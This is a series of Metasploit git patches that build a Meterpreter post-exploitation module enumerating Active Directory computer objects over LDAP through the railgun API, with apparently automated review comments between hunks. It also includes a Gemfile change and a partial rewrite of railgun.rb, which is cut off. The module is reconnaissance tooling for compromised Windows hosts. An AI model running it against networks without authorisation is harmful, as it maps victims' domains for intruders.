+ 'Header' => 'AD Computers', + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => attributes + ) + + results.each do |result| + row = [] + + result['attributes'].each do |attr| + row << attr['values'] + end + + results_table << row + end + + print_line results_table.to_s + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', # 'userAccountControl','badPwdCount','codePage','countryCode', 
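Review bot: `query_ldap(...)[0]['attributes'][0]['values']` indexes the return value directly, but `query_ldap` (defined in a later hunk of this file) exits with a bare `return` when the search fails, so a failed root query raises NoMethodError on nil instead of printing a usable message. Split it into `root = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])` followed by `return print_error('Could not read defaultNamingContext') if root.nil? || root.empty?`. The `results.each` loop further down in this hunk has the same problem when the second query fails. `defaultNamingContext` should be snake_case (`default_naming_context`) to match the other locals in the method.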
@@ -54,24 +79,36 @@ def run # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' # ] - - print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - - wldap32 = client.railgun.wldap32 + end + + def wldap32 + return client.railgun.wldap32 + end + + def bind_default_ldap_server + vprint_status ("Initializing LDAP connection.") + session_handle = wldap32.ldap_sslinitA("\x00\x00\x00\x00", 389, 0)['return'] + vprint_status("LDAP Handle: #{session_handle}") - print_status ("Initialize LDAP connection.") - ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] - vprint_status("LDAP Handle: #{ldap_handle}") + if session_handle == 0 + print_error("Unable to connect to LDAP server") + return 0 + end - print_status ("Bindings to LDAP server.") - bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE + vprint_status ("Binding to LDAP server.") + bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE - print_status ("Searching LDAP directory.") - - base = "DC=test,DC=lab" - scope = 2 #LDAP_SCOPE_SUBTREE + if bind != 0 + print_error("Unable to bind to LDAP server") + return 0 + end + + return session_handle + end - search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) + def query_ldap(session_handle, base, scope, filter, attributes) + vprint_status ("Searching LDAP directory.") + search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) vprint_status("search: #{search}") if search['return'] != 0 
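Review bot: `query_ldap` accepts `attributes` but still passes `nil` as the attribute list to `ldap_search_sA`, so the directory returns every attribute of every matching object and the list only controls what is read back afterwards. Until the attribute array is marshalled, say so above the call: `# attrs is nil: the server returns all attributes; 'attributes' only selects what is read back`. The literal `4` passed for the `res` out parameter also needs a comment stating what it represents; it is presumably the size in bytes of the returned pointer, which should be confirmed. In `bind_default_ldap_server` the failed-bind path returns 0 without releasing `session_handle`, and the declared `LdapGetLastError` is never used to report why the call failed. The body of `query_ldap` continues outside this hunk.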
@@ -80,26 +117,30 @@ def run return end - search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] + search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] print_status("Entries retrieved: #{search_count}") - - print_status("Retrieving results...") + vprint_status("Retrieving results...") entries = {} + entry_results = [] + + # user definied limit on entries to search? for i in 0..(search_count-1) - print_line "-"*46 + print '.' + if i==0 - entries[i] = wldap32.ldap_first_entry(ldap_handle, search['res'])['return'] + entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else - entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] + entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") + attribute_results = [] attributes.each do |attr| - print_status("Attr: #{attr}") + vprint_status("Attr: #{attr}") - pp_value = wldap32.ldap_get_values(ldap_handle, entries[i], attr)['return'] + pp_value = wldap32.ldap_get_values(session_handle, entries[i], attr)['return'] vprint_status("ppValue: 0x#{pp_value.to_s(16)}") if pp_value == 0 @@ -108,6 +149,7 @@ def run count = wldap32.ldap_count_values(pp_value)['return'] vprint_status "Value count: #{count}" + value_results = [] if count < 1 vprint_error("Bad Value List") else @@ -115,8 +157,10 @@ def run p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) - print_status "Value: #{value}" + vprint_status "Value: #{value}" + value_results << value end + value_results = value_results.join('|') end end 
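Review bot: `value_results` ends up with three different shapes: it is never assigned when `pp_value == 0`, stays an empty Array when `count < 1`, and becomes a String only after `value_results.join('|')`, so the `"values"` entry built in the following hunk (`@@ -124,7 +168,14 @@`) can be nil, `[]` or a String. Initialise `value_results = []` before the `if pp_value == 0` test and join once when the hash is built: `attribute_results << {"name" => attr, "values" => value_results.join('|')}`. `print '.'` writes straight to standard output rather than through the `print_*`/`vprint_*` helpers used everywhere else in the file. The `for i in 0..(search_count-1)` loop with an index-keyed `entries` hash could be a plain `search_count.times` over an Array.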
@@ -124,7 +168,14 @@ def run vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end + + attribute_results << {"name" => attr, "values" => value_results} end + + entry_results << {"id" => i, "attributes" => attribute_results} end + + print_line + return entry_results end end From 761d83ac0ce110b2d3c67c6831ed0b02b7671d62 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 20 Dec 2012 16:29:21 +0000 Subject: [PATCH 010/421] Tidyup and user options --- .../post/windows/gather/enum_ad_computers.rb | 59 +++++++++++++------ 1 file changed, 42 insertions(+), 17 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 338fe1f2a664..81470e443fce 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -17,13 +17,19 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ - This module will enumerate computers included in the primary Domain. + This module will enumerate computers in the default AD directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell ' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) + + register_options([ + OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 20]), + OptBool.new('STORE', [true, 'Store file in loot.', false]), + OptString.new('ATTRIBS', [true, 'Attributes to retrieve.', 'dNSHostName,distinguishedName,description,operatingSystem']) + ], self.class) end def read_value(addr) 
@@ -44,7 +50,19 @@ def run defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] print_status("Default Naming Context #{defaultNamingContext}") - attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + attributes = datastore['ATTRIBS'].split(',') + + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', + # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', + # 'userAccountControl','badPwdCount','codePage','countryCode', + # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', + # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', + # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', + # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', + # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', + # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', + # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' + # ] print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) 
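Review bot: `datastore['ATTRIBS'].split(',')` keeps surrounding whitespace and empty items, so a value such as `dNSHostName, description` requests an attribute named ` description` and a trailing comma adds an empty name; use `attributes = datastore['ATTRIBS'].split(',').map(&:strip).reject(&:empty?)`. The commented-out attribute array moved into `run` is dead code; if it is meant as a reference list, fold it into the `ATTRIBS` option description instead. `run` continues outside this hunk.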
@@ -60,25 +78,22 @@ def run row = [] result['attributes'].each do |attr| - row << attr['values'] + if attr['values'].nil? + row << "" + else + row << attr['values'] + end end results_table << row + end print_line results_table.to_s - - #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', - # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', - # 'userAccountControl','badPwdCount','codePage','countryCode', - # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', - # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', - # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', - # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', - # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', - # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', - # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' - # ] + if datastore['STORE'] + stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) + print_status("Results saved to: #{stored_path}") + end end def wldap32 @@ -125,8 +140,14 @@ def query_ldap(session_handle, base, scope, filter, attributes) entries = {} entry_results = [] + if datastore['MAX_SEARCH'] == 0 + max_search = search_count + else + max_search = [datastore['MAX_SEARCH'], search_count].min + end + # user definied limit on entries to search? - for i in 0..(search_count-1) + for i in 0..(max_search-1) print '.' if i==0 @@ -158,7 +179,11 @@ def query_ldap(session_handle, base, scope, filter, attributes) vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) vprint_status "Value: #{value}" - value_results << value + if value.nil? + value_results << "" + else + value_results << value + end end value_results = value_results.join('|') end From e8cf26390a1bfcdd66a9045d70ead6026f5e554c Mon Sep 17 00:00:00 2001 
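Review bot: The `if value.nil?` guard added in `query_ldap` (hunk `@@ -158,7 +179,11 @@`) cannot fire: `read_value` ends with `return value.strip`, so it either returns a String or raises before the caller ever sees nil. Put the guard where the nil can occur, as `return value.to_s.strip` in `read_value` (outside this hunk), and keep the caller as `value_results << value`. In the `@@ -125,8 +140,14 @@` hunk a negative `MAX_SEARCH` makes `0..(max_search-1)` an empty range and the module silently returns nothing; reject negative values or treat them like 0.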
From: Meatballs1 Date: Thu, 20 Dec 2012 16:34:10 +0000 Subject: [PATCH 011/421] Msftidy --- .../post/windows/gather/enum_ad_computers.rb | 66 +++++++++---------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 81470e443fce..caf0278fd2cf 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -24,7 +24,7 @@ def initialize(info={}) 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) - + register_options([ OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 20]), OptBool.new('STORE', [true, 'Store file in loot.', false]), @@ -37,21 +37,21 @@ def read_value(addr) value = client.railgun.memread(addr, val_size) return value.strip end - + def run print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server - + if session_handle == 0 return end - + print_status("Querying default naming context") defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] print_status("Default Naming Context #{defaultNamingContext}") - + attributes = datastore['ATTRIBS'].split(',') - + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', # 'userAccountControl','badPwdCount','codePage','countryCode', 
@@ -63,20 +63,20 @@ def run # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' # ] - + print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) - + results_table = Rex::Ui::Text::Table.new( 'Header' => 'AD Computers', 'Indent' => 1, 'SortIndex' => -1, 'Columns' => attributes ) - + results.each do |result| row = [] - + result['attributes'].each do |attr| if attr['values'].nil? row << "" @@ -86,25 +86,25 @@ def run end results_table << row - + end - + print_line results_table.to_s if datastore['STORE'] stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) print_status("Results saved to: #{stored_path}") end end - + def wldap32 return client.railgun.wldap32 end - + def bind_default_ldap_server vprint_status ("Initializing LDAP connection.") session_handle = wldap32.ldap_sslinitA("\x00\x00\x00\x00", 389, 0)['return'] vprint_status("LDAP Handle: #{session_handle}") - + if session_handle == 0 print_error("Unable to connect to LDAP server") return 0 @@ -112,20 +112,20 @@ def bind_default_ldap_server vprint_status ("Binding to LDAP server.") bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE - + if bind != 0 print_error("Unable to bind to LDAP server") return 0 - end - + end + return session_handle end def query_ldap(session_handle, base, scope, filter, attributes) vprint_status ("Searching LDAP directory.") - search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) + search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) vprint_status("search: #{search}") - + if search['return'] != 0 print_error("No results") wldap32.ldap_msgfree(search['res']) 
@@ -134,42 +134,42 @@ def query_ldap(session_handle, base, scope, filter, attributes) search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] print_status("Entries retrieved: #{search_count}") - + vprint_status("Retrieving results...") - + entries = {} entry_results = [] - + if datastore['MAX_SEARCH'] == 0 max_search = search_count else max_search = [datastore['MAX_SEARCH'], search_count].min end - + # user definied limit on entries to search? for i in 0..(max_search-1) print '.' - + if i==0 entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") - + attribute_results = [] attributes.each do |attr| vprint_status("Attr: #{attr}") - + pp_value = wldap32.ldap_get_values(session_handle, entries[i], attr)['return'] vprint_status("ppValue: 0x#{pp_value.to_s(16)}") - + if pp_value == 0 vprint_error("No attribute value returned.") - else + else count = wldap32.ldap_count_values(pp_value)['return'] vprint_status "Value count: #{count}" - + value_results = [] if count < 1 vprint_error("Bad Value List") @@ -193,13 +193,13 @@ def query_ldap(session_handle, base, scope, filter, attributes) vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end - + attribute_results << {"name" => attr, "values" => value_results} end - + entry_results << {"id" => i, "attributes" => attribute_results} end - + print_line return entry_results end From 0fb36f20240aa237237a081800bc37f84cdc0eb5 Mon Sep 17 00:00:00 2001 
From: Luke Imhoff Date: Fri, 28 Dec 2012 13:28:19 -0600 Subject: [PATCH 012/421] Get pg as a dependency of metasploit_data_models [#38274165] metasploit_data_models already declares pg as a runtime dependency in its gemspec, so there is no need to add pg as a direct dependency of metasploit-framework, since metasploit-framework only needs pg for metasploit_data_models. --- Gemfile | 2 -- Gemfile.lock | 1 - 2 files changed, 3 deletions(-) diff --git a/Gemfile b/Gemfile index 52d2e44c5135..0bb1135b0bf7 100755 --- a/Gemfile +++ b/Gemfile @@ -6,8 +6,6 @@ gem 'activesupport', '>= 3.0.0' gem 'activerecord' # Database models shared between framework and Pro. gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' -# Needed for module caching in Mdm::ModuleDetails -gem 'pg', '>= 0.11' group :development do # Markdown formatting for yard diff --git a/Gemfile.lock b/Gemfile.lock index 3f4ffb72e03d..a9531cb60126 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -60,7 +60,6 @@ DEPENDENCIES activerecord activesupport (>= 3.0.0) metasploit_data_models! - pg (>= 0.11) rake redcarpet rspec (>= 2.12) From 0b3143ff45a9a4250f724f0db324660a25fb5b1b Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 30 Dec 2012 16:32:15 +0000 Subject: [PATCH 013/421] Fix railgun EOL --- .../extensions/stdapi/railgun/railgun.rb | 598 +++++++++--------- 1 file changed, 299 insertions(+), 299 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb index 9c5dc4651c71..d0c3e1c60895 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb 
@@ -1,299 +1,299 @@ -# -*- coding: binary -*- -# Copyright (c) 2010, patrickHVE@googlemail.com -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * The names of the author may not be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# -# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. 
-# - -# -# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything -# - -require 'pp' -require 'enumerator' - -require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' -require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' -require 'rex/post/meterpreter/extensions/stdapi/railgun/util' -require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' -require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' - -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun - - -# -# The Railgun class to dynamically expose the Windows API. -# -class Railgun - - # - # Railgun::DLL's that have builtin definitions. - # - # If you want to add additional DLL definitions to be preloaded create a - # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. - # Naming is important and should follow convention. For example, if your - # dll's name was "my_dll" - # file name: def_my_dll.rb - # class name: Def_my_dll - # entry below: 'my_dll' - # - BUILTIN_DLLS = [ - 'kernel32', - 'ntdll', - 'user32', - 'ws2_32', - 'iphlpapi', - 'advapi32', - 'shell32', - 'netapi32', - 'crypt32', - 'wlanapi', - 'wldap32' - ].freeze - - ## - # Returns a Hash containing DLLs added to this instance with #add_dll - # as well as references to any frozen cached dlls added directly in #get_dll - # and copies of any frozen dlls (added directly with #add_function) - # that the user attempted to modify with #add_function. - # - # Keys are friendly DLL names and values are the corresponding DLL instance - attr_accessor :dlls - - ## - # Contains a reference to the client that corresponds to this instance of railgun - attr_accessor :client - - ## - # These DLLs are loaded lazily and then shared amongst all railgun instances. 
- # For safety reasons this variable should only be read/written within #get_dll. - @@cached_dlls = {} - - # if you are going to touch @@cached_dlls, wear protection - @@cache_semaphore = Mutex.new - - def initialize(client) - self.client = client - self.dlls = {} - end - - def self.builtin_dlls - BUILTIN_DLLS - end - - # - # Return this Railgun's Util instance. - # - def util - if @util.nil? - @util = Util.new(self, client.platform) - end - - return @util - end - - # - # Return this Railgun's WinConstManager instance, initially populated with - # constants defined in ApiConstants. - # - def constant_manager - # Loads lazily - return ApiConstants.manager - end - - # - # Read data from a memory address on the host (useful for working with - # LPVOID parameters) - # - def memread(address, length) - - raise "Invalid parameters." if(not address or not length) - - request = Packet.create_request('stdapi_railgun_memread') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) - end - - return nil - end - - # - # Write data to a memory address on the host (useful for working with - # LPVOID parameters) - # - def memwrite(address, data, length) - - raise "Invalid parameters." if(not address or not data or not length) - - request = Packet.create_request('stdapi_railgun_memwrite') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return true - end - - return false - end - - # - # Adds a function to an existing DLL definition. - # - # If the DLL definition is frozen (ideally this should be the case for all - # cached dlls) an unfrozen copy is created and used henceforth for this - # instance. 
- # - def add_function(dll_name, function_name, return_type, params, windows_name=nil) - - unless known_dll_names.include?(dll_name) - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" - end - - dll = get_dll(dll_name) - - # For backwards compatibility, we ensure the dll is thawed - if dll.frozen? - # Duplicate not only the dll, but its functions as well. Frozen status will be lost - dll = Marshal.load(Marshal.dump(dll)) - - # Update local dlls with the modifiable duplicate - dlls[dll_name] = dll - end - - dll.add_function(function_name, return_type, params, windows_name) - end - - # - # Adds a DLL to this Railgun. - # - # The +windows_name+ is the name used on the remote system and should be - # set appropriately if you want to include a path or the DLL name contains - # non-ruby-approved characters. - # - # Raises an exception if a dll with the given name has already been - # defined. - # - def add_dll(dll_name, windows_name=dll_name) - - if dlls.has_key? dll_name - raise "A DLL of name #{dll_name} has already been loaded." - end - - dlls[dll_name] = DLL.new(windows_name, constant_manager) - end - - - def known_dll_names - return BUILTIN_DLLS | dlls.keys - end - - # - # Attempts to provide a DLL instance of the given name. Handles lazy - # loading and caching. Note that if a DLL of the given name does not - # exist, returns nil - # - def get_dll(dll_name) - - # If the DLL is not local, we now either load it from cache or load it lazily. - # In either case, a reference to the dll is stored in the collection "dlls" - # If the DLL can not be found/created, no actions are taken - unless dlls.has_key? dll_name - # We read and write to @@cached_dlls and rely on state consistency - @@cache_semaphore.synchronize do - if @@cached_dlls.has_key? dll_name - dlls[dll_name] = @@cached_dlls[dll_name] - elsif BUILTIN_DLLS.include? 
dll_name - # I highly doubt this case will ever occur, but I am paranoid - if dll_name !~ /^\w+$/ - raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" - end - - require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name - dll = Def.const_get('Def_' << dll_name).create_dll.freeze - - @@cached_dlls[dll_name] = dll - dlls[dll_name] = dll - end - end - - end - - return dlls[dll_name] - end - - # - # Fake having members like user32 and kernel32. - # reason is that - # ...user32.MessageBoxW() - # is prettier than - # ...dlls["user32"].functions["MessageBoxW"]() - # - def method_missing(dll_symbol, *args) - dll_name = dll_symbol.to_s - - unless known_dll_names.include? dll_name - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" - end - - dll = get_dll(dll_name) - - return DLLWrapper.new(dll, client) - end - - # - # Return a Windows constant matching +str+. - # - def const(str) - return constant_manager.parse(str) - end - - # - # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) - # - def multi(functions) - if @multicaller.nil? - @multicaller = MultiCaller.new(client, self) - end - - return @multicaller.call(functions) - end -end - -end; end; end; end; end; end +# -*- coding: binary -*- +# Copyright (c) 2010, patrickHVE@googlemail.com +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * The names of the author may not be used to endorse or promote products +# derived from this software without specific prior written permission. 
+# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +# +# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. +# + +# +# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything +# + +require 'pp' +require 'enumerator' + +require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' +require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' +require 'rex/post/meterpreter/extensions/stdapi/railgun/util' +require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' +require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' + +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun + + +# +# The Railgun class to dynamically expose the Windows API. +# +class Railgun + + # + # Railgun::DLL's that have builtin definitions. + # + # If you want to add additional DLL definitions to be preloaded create a + # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. + # Naming is important and should follow convention. 
For example, if your + # dll's name was "my_dll" + # file name: def_my_dll.rb + # class name: Def_my_dll + # entry below: 'my_dll' + # + BUILTIN_DLLS = [ + 'kernel32', + 'ntdll', + 'user32', + 'ws2_32', + 'iphlpapi', + 'advapi32', + 'shell32', + 'netapi32', + 'crypt32', + 'wlanapi', + 'wldap32' + ].freeze + + ## + # Returns a Hash containing DLLs added to this instance with #add_dll + # as well as references to any frozen cached dlls added directly in #get_dll + # and copies of any frozen dlls (added directly with #add_function) + # that the user attempted to modify with #add_function. + # + # Keys are friendly DLL names and values are the corresponding DLL instance + attr_accessor :dlls + + ## + # Contains a reference to the client that corresponds to this instance of railgun + attr_accessor :client + + ## + # These DLLs are loaded lazily and then shared amongst all railgun instances. + # For safety reasons this variable should only be read/written within #get_dll. + @@cached_dlls = {} + + # if you are going to touch @@cached_dlls, wear protection + @@cache_semaphore = Mutex.new + + def initialize(client) + self.client = client + self.dlls = {} + end + + def self.builtin_dlls + BUILTIN_DLLS + end + + # + # Return this Railgun's Util instance. + # + def util + if @util.nil? + @util = Util.new(self, client.platform) + end + + return @util + end + + # + # Return this Railgun's WinConstManager instance, initially populated with + # constants defined in ApiConstants. + # + def constant_manager + # Loads lazily + return ApiConstants.manager + end + + # + # Read data from a memory address on the host (useful for working with + # LPVOID parameters) + # + def memread(address, length) + + raise "Invalid parameters." 
if(not address or not length) + + request = Packet.create_request('stdapi_railgun_memread') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) + end + + return nil + end + + # + # Write data to a memory address on the host (useful for working with + # LPVOID parameters) + # + def memwrite(address, data, length) + + raise "Invalid parameters." if(not address or not data or not length) + + request = Packet.create_request('stdapi_railgun_memwrite') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return true + end + + return false + end + + # + # Adds a function to an existing DLL definition. + # + # If the DLL definition is frozen (ideally this should be the case for all + # cached dlls) an unfrozen copy is created and used henceforth for this + # instance. + # + def add_function(dll_name, function_name, return_type, params, windows_name=nil) + + unless known_dll_names.include?(dll_name) + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" + end + + dll = get_dll(dll_name) + + # For backwards compatibility, we ensure the dll is thawed + if dll.frozen? + # Duplicate not only the dll, but its functions as well. Frozen status will be lost + dll = Marshal.load(Marshal.dump(dll)) + + # Update local dlls with the modifiable duplicate + dlls[dll_name] = dll + end + + dll.add_function(function_name, return_type, params, windows_name) + end + + # + # Adds a DLL to this Railgun. + # + # The +windows_name+ is the name used on the remote system and should be + # set appropriately if you want to include a path or the DLL name contains + # non-ruby-approved characters. 
